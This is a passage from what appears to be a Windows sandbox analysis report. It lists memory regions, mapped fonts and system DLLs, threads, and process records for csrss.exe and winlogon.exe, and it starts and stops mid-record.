36698 start_va = 0xc40000 end_va = 0x108efff entry_point = 0xc40000 region_type = mapped_file name = "malgunbd.ttf" filename = 
"\\Windows\\Fonts\\malgunbd.ttf" (normalized: "c:\\windows\\fonts\\malgunbd.ttf") Region: id = 36699 start_va = 0xc40000 end_va = 0x1557fff entry_point = 0xc40000 region_type = mapped_file name = "meiryo.ttc" filename = "\\Windows\\Fonts\\meiryo.ttc" (normalized: "c:\\windows\\fonts\\meiryo.ttc") Region: id = 36700 start_va = 0xc40000 end_va = 0x158cfff entry_point = 0xc40000 region_type = mapped_file name = "meiryob.ttc" filename = "\\Windows\\Fonts\\meiryob.ttc" (normalized: "c:\\windows\\fonts\\meiryob.ttc") Region: id = 36701 start_va = 0xc40000 end_va = 0x20e8fff entry_point = 0xc40000 region_type = mapped_file name = "msjh.ttf" filename = "\\Windows\\Fonts\\msjh.ttf" (normalized: "c:\\windows\\fonts\\msjh.ttf") Region: id = 36702 start_va = 0xc40000 end_va = 0x1a16fff entry_point = 0xc40000 region_type = mapped_file name = "msjhbd.ttf" filename = "\\Windows\\Fonts\\msjhbd.ttf" (normalized: "c:\\windows\\fonts\\msjhbd.ttf") Region: id = 36703 start_va = 0xc40000 end_va = 0x2102fff entry_point = 0xc40000 region_type = mapped_file name = "msyh.ttf" filename = "\\Windows\\Fonts\\msyh.ttf" (normalized: "c:\\windows\\fonts\\msyh.ttf") Region: id = 36704 start_va = 0xc40000 end_va = 0x1a2dfff entry_point = 0xc40000 region_type = mapped_file name = "msyhbd.ttf" filename = "\\Windows\\Fonts\\msyhbd.ttf" (normalized: "c:\\windows\\fonts\\msyhbd.ttf") Region: id = 36705 start_va = 0xc40000 end_va = 0x2af9fff entry_point = 0xc40000 region_type = mapped_file name = "mingliu.ttc" filename = "\\Windows\\Fonts\\mingliu.ttc" (normalized: "c:\\windows\\fonts\\mingliu.ttc") Region: id = 36706 start_va = 0xc40000 end_va = 0x2c7dfff entry_point = 0xc40000 region_type = mapped_file name = "mingliub.ttc" filename = "\\Windows\\Fonts\\mingliub.ttc" (normalized: "c:\\windows\\fonts\\mingliub.ttc") Region: id = 36707 start_va = 0xc40000 end_va = 0x1500fff entry_point = 0xc40000 region_type = mapped_file name = "msgothic.ttc" filename = "\\Windows\\Fonts\\msgothic.ttc" (normalized: 
"c:\\windows\\fonts\\msgothic.ttc") Region: id = 36708 start_va = 0xc40000 end_va = 0x15d7fff entry_point = 0xc40000 region_type = mapped_file name = "msmincho.ttc" filename = "\\Windows\\Fonts\\msmincho.ttc" (normalized: "c:\\windows\\fonts\\msmincho.ttc") Region: id = 36709 start_va = 0x4d0000 end_va = 0x54efff entry_point = 0x4d0000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 36710 start_va = 0x570000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 36711 start_va = 0x4d0000 end_va = 0x549fff entry_point = 0x4d0000 region_type = mapped_file name = "segoeuib.ttf" filename = "\\Windows\\Fonts\\segoeuib.ttf" (normalized: "c:\\windows\\fonts\\segoeuib.ttf") Region: id = 36712 start_va = 0xc40000 end_va = 0x1addfff entry_point = 0xc40000 region_type = mapped_file name = "simsun.ttc" filename = "\\Windows\\Fonts\\simsun.ttc" (normalized: "c:\\windows\\fonts\\simsun.ttc") Region: id = 36713 start_va = 0xc40000 end_va = 0x1af1fff entry_point = 0xc40000 region_type = mapped_file name = "simsunb.ttf" filename = "\\Windows\\Fonts\\simsunb.ttf" (normalized: "c:\\windows\\fonts\\simsunb.ttf") Region: id = 36714 start_va = 0xaa0000 end_va = 0xb4afff entry_point = 0xaa0000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 36715 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 36716 start_va = 0x4d0000 end_va = 0x56ffff entry_point = 0x4d0000 region_type = mapped_file name = "micross.ttf" filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf") Region: id = 36729 start_va = 0x200000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" 
filename = "" Region: id = 36753 start_va = 0xd0000 end_va = 0xeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 36754 start_va = 0x75c00000 end_va = 0x75c03fff entry_point = 0x75c00000 region_type = mapped_file name = "kbdus.dll" filename = "\\Windows\\System32\\KBDUS.DLL" (normalized: "c:\\windows\\system32\\kbdus.dll") Region: id = 36755 start_va = 0x90000 end_va = 0x96fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 36756 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 36757 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_arrow.cur" filename = "\\Windows\\Cursors\\aero_arrow.cur" (normalized: "c:\\windows\\cursors\\aero_arrow.cur") Region: id = 36758 start_va = 0x6a0000 end_va = 0xa92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 36759 start_va = 0x4d0000 end_va = 0x50dfff entry_point = 0x4d0000 region_type = mapped_file name = "aero_busy.ani" filename = "\\Windows\\Cursors\\aero_busy.ani" (normalized: "c:\\windows\\cursors\\aero_busy.ani") Region: id = 36760 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_up.cur" filename = "\\Windows\\Cursors\\aero_up.cur" (normalized: "c:\\windows\\cursors\\aero_up.cur") Region: id = 36761 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_nwse.cur" filename = "\\Windows\\Cursors\\aero_nwse.cur" (normalized: "c:\\windows\\cursors\\aero_nwse.cur") Region: id = 36762 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_nesw.cur" filename = "\\Windows\\Cursors\\aero_nesw.cur" (normalized: "c:\\windows\\cursors\\aero_nesw.cur") Region: id = 36763 
start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_ew.cur" filename = "\\Windows\\Cursors\\aero_ew.cur" (normalized: "c:\\windows\\cursors\\aero_ew.cur") Region: id = 36764 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_ns.cur" filename = "\\Windows\\Cursors\\aero_ns.cur" (normalized: "c:\\windows\\cursors\\aero_ns.cur") Region: id = 36765 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_move.cur" filename = "\\Windows\\Cursors\\aero_move.cur" (normalized: "c:\\windows\\cursors\\aero_move.cur") Region: id = 36766 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_unavail.cur" filename = "\\Windows\\Cursors\\aero_unavail.cur" (normalized: "c:\\windows\\cursors\\aero_unavail.cur") Region: id = 36767 start_va = 0x4d0000 end_va = 0x50dfff entry_point = 0x4d0000 region_type = mapped_file name = "aero_working.ani" filename = "\\Windows\\Cursors\\aero_working.ani" (normalized: "c:\\windows\\cursors\\aero_working.ani") Region: id = 36768 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_helpsel.cur" filename = "\\Windows\\Cursors\\aero_helpsel.cur" (normalized: "c:\\windows\\cursors\\aero_helpsel.cur") Region: id = 36769 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_pen.cur" filename = "\\Windows\\Cursors\\aero_pen.cur" (normalized: "c:\\windows\\cursors\\aero_pen.cur") Region: id = 36770 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_link.cur" filename = "\\Windows\\Cursors\\aero_link.cur" (normalized: "c:\\windows\\cursors\\aero_link.cur") Region: id = 36771 start_va = 0x75c00000 end_va = 0x75c05fff entry_point = 0x75c00000 region_type = mapped_file name = "wls0wndh.dll" filename = "\\Windows\\System32\\WlS0WndH.dll" (normalized: 
"c:\\windows\\system32\\wls0wndh.dll") Region: id = 36772 start_va = 0xc40000 end_va = 0x183ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 36773 start_va = 0x4d0000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 36774 start_va = 0x5c0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 36775 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 36776 start_va = 0x18f0000 end_va = 0x192ffff entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 36777 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 36778 start_va = 0x1930000 end_va = 0x1bfefff entry_point = 0x1930000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37084 start_va = 0x4d0000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 37085 start_va = 0x530000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 37086 start_va = 0xae0000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 37087 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37112 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: 
"c:\\windows\\system32\\cryptbase.dll") Region: id = 37320 start_va = 0x1890000 end_va = 0x18cffff entry_point = 0x0 region_type = private name = "private_0x0000000001890000" filename = "" Region: id = 37321 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37322 start_va = 0x77120000 end_va = 0x77154fff entry_point = 0x77120000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 37323 start_va = 0x770f0000 end_va = 0x770f5fff entry_point = 0x770f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 37324 start_va = 0x75700000 end_va = 0x7573bfff entry_point = 0x75700000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 37325 start_va = 0x75230000 end_va = 0x75234fff entry_point = 0x75230000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 37360 start_va = 0x756f0000 end_va = 0x756f5fff entry_point = 0x756f0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 37361 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 37362 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 37363 start_va = 0x75740000 end_va = 0x75755fff 
entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37364 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37365 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37366 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37367 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37368 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37369 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37370 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37371 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37372 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37373 start_va = 0x753e0000 end_va = 0x753e7fff entry_point = 0x753e0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37374 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37692 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = 
"\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Thread: id = 1036 os_tid = 0x164 Thread: id = 1043 os_tid = 0x190 Thread: id = 1044 os_tid = 0x194 Thread: id = 1053 os_tid = 0x1b4 Thread: id = 1054 os_tid = 0x1b8 Thread: id = 1056 os_tid = 0x1c8 Thread: id = 1065 os_tid = 0x1f4 Thread: id = 1111 os_tid = 0x2b8 Process: id = "665" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x7f1d1040" os_pid = "0x16c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "663" os_parent_pid = "0x158" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36564 start_va = 0x0 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x (null)" filename = "" Region: id = 36565 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 36566 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 36567 start_va = 0x4a300000 end_va = 0x4a304fff entry_point = 0x4a300000 region_type = mapped_file name = "csrss.exe" filename = "\\Windows\\System32\\csrss.exe" (normalized: "c:\\windows\\system32\\csrss.exe") Region: id = 36568 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36569 
start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36570 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36571 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 36572 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 36573 start_va = 0x75cb0000 end_va = 0x75cbcfff entry_point = 0x75cb0000 region_type = mapped_file name = "csrsrv.dll" filename = "\\Windows\\System32\\csrsrv.dll" (normalized: "c:\\windows\\system32\\csrsrv.dll") Region: id = 36574 start_va = 0x100000 end_va = 0x166fff entry_point = 0x100000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36575 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 36576 start_va = 0x75c70000 end_va = 0x75c9bfff entry_point = 0x75c70000 region_type = mapped_file name = "winsrv.dll" filename = "\\Windows\\System32\\winsrv.dll" (normalized: "c:\\windows\\system32\\winsrv.dll") Region: id = 36577 start_va = 0x75ca0000 end_va = 0x75cadfff entry_point = 0x75ca0000 region_type = mapped_file name = "basesrv.dll" filename = "\\Windows\\System32\\basesrv.dll" (normalized: "c:\\windows\\system32\\basesrv.dll") Region: id = 36578 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36579 
start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36580 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36581 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36582 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36583 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36584 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36585 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36593 start_va = 0x170000 end_va = 0x176fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 36594 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 36595 start_va = 0x1d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 36596 start_va = 
0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 36597 start_va = 0x2f0000 end_va = 0x2f1fff entry_point = 0x2f0000 region_type = mapped_file name = "vgasys.fon" filename = "\\Windows\\Fonts\\vgasys.fon" (normalized: "c:\\windows\\fonts\\vgasys.fon") Region: id = 36598 start_va = 0x470000 end_va = 0x862fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 36599 start_va = 0x8b0000 end_va = 0x8effff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 36600 start_va = 0xa30000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 36601 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36602 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36603 start_va = 0x75c60000 end_va = 0x75c68fff entry_point = 0x75c60000 region_type = mapped_file name = "sxssrv.dll" filename = "\\Windows\\System32\\sxssrv.dll" (normalized: "c:\\windows\\system32\\sxssrv.dll") Region: id = 36604 start_va = 0x940000 end_va = 0x97ffff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 36605 start_va = 0x9b0000 end_va = 0x9effff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 36606 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 36607 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 36787 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 36788 start_va = 0x300000 end_va = 0x300fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 36789 start_va = 0xa70000 end_va = 0xb37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 36790 start_va = 0xc20000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 36791 start_va = 0xcb0000 end_va = 0xceffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 36792 start_va = 0xcf0000 end_va = 0xd2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 36793 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 36794 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37457 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x1a0000 region_type = mapped_file name = "marlett.ttf" filename = "\\Windows\\Fonts\\marlett.ttf" (normalized: "c:\\windows\\fonts\\marlett.ttf") Region: id = 37458 start_va = 0x1b0000 end_va = 0x1cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 37459 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 37460 start_va = 0x320000 end_va = 0x321fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 37461 start_va = 0xb40000 end_va = 0xbbefff entry_point = 0xb40000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: 
"c:\\windows\\fonts\\segoeui.ttf") Region: id = 37462 start_va = 0xd30000 end_va = 0x192ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 37463 start_va = 0x75bb0000 end_va = 0x75c0efff entry_point = 0x75bb0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 37464 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37465 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37466 start_va = 0x340000 end_va = 0x343fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 37476 start_va = 0x340000 end_va = 0x341fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 37513 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 37514 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37517 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37524 start_va = 0x350000 end_va = 0x350fff entry_point = 0x350000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 37525 start_va = 0x360000 end_va = 0x361fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000360000" filename = "" Region: id = 37542 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37553 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37665 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37670 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37682 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 38528 start_va = 0x1930000 end_va = 0x19cffff entry_point = 0x1930000 region_type = mapped_file name = "micross.ttf" filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf") Region: id = 38563 start_va = 0x170000 end_va = 0x176fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 38564 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 38565 start_va = 0x470000 end_va = 0x862fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 38566 start_va = 0x350000 end_va = 0x353fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 38576 start_va = 0x350000 end_va = 0x350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 38627 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 38628 
start_va = 0x360000 end_va = 0x361fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 38688 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 38689 start_va = 0x870000 end_va = 0x871fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 38713 start_va = 0x870000 end_va = 0x872fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 38742 start_va = 0x870000 end_va = 0x871fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 38767 start_va = 0x870000 end_va = 0x871fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Thread: id = 1037 os_tid = 0x170 Thread: id = 1038 os_tid = 0x174 Thread: id = 1039 os_tid = 0x178 Thread: id = 1040 os_tid = 0x17c Thread: id = 1041 os_tid = 0x180 Thread: id = 1046 os_tid = 0x19c Thread: id = 1052 os_tid = 0x1b0 Thread: id = 1055 os_tid = 0x1bc Process: id = "666" image_name = "winlogon.exe" filename = "c:\\windows\\system32\\winlogon.exe" page_root = "0x7f1d10c0" os_pid = "0x184" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "663" os_parent_pid = "0x158" cmd_line = "winlogon.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36641 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 36642 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 36643 start_va = 0x8a0000 end_va = 
